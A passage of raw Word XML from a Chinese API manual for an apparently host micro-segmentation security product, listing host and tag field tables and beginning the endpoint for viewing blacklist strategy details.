    <w:p w14:paraId="45E1A26E"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708"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4612"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="47CFBB6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C213903" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21952D3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F54E74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AD7B4BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0755B458" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DF4377B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D016DA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07519900" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203DD583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>matchIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F34B90F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24AC76AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>匹配</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="573B54D2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="606759C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77EC441D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DFE1368" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23EBCEA7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A31E68A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07660557" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE79FD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74502B79" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2863A487" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11AB89F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD78D2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1204906B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42A0B446" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A30A9E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F235BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EC83E27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54251CE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED2C76D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67395D96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>在线状态,0离线 1在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69D206CA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03051EE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msSwitchStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="767F81B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A06F14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离开关：0关闭 1开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48A637FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="395B59E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00941F87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D8A2B26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否可用，yes：可用，no：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>不</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EB7311B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BBE820F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4690462D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E10630" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C205955" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E3D88F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F7DA9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="168A8BC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略状态,0：新建，1：待同步，2：已同步,3:删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55CF9A44" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="600FF322" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EEF56B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EDE6B85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统类型，1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>， 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="000C2AE4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="185E1173" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD02E15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C84DC82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>在线状态，0：离线，1：在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DD62120" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HostTagVO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3828"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1123036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AC1C096" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06061AA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333847B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61E82185" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07475A4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="575FC616" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103F27D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CBF8537" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215AD0EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tagName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340DACE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BAED21E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DD6BEC4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A667149" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tagColor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7714E358" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7762A166" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签颜色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C28E7F5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="526130A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7594737F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B1FC080" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统类型，1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>， 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21C0C450" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78578CB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51BDA20B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FE52F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B38061A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="_Toc115166300"/>
      <w:bookmarkStart w:id="456" w:name="查看策略详情"/>
      <w:bookmarkEnd w:id="454"/>
      <w:r>
        <w:t>查看策略详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w14:paraId="2F4F19DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A02E65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04209CE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="57BB94F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22F2273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15499742" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="433C6DA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0047A618" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="088848C7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
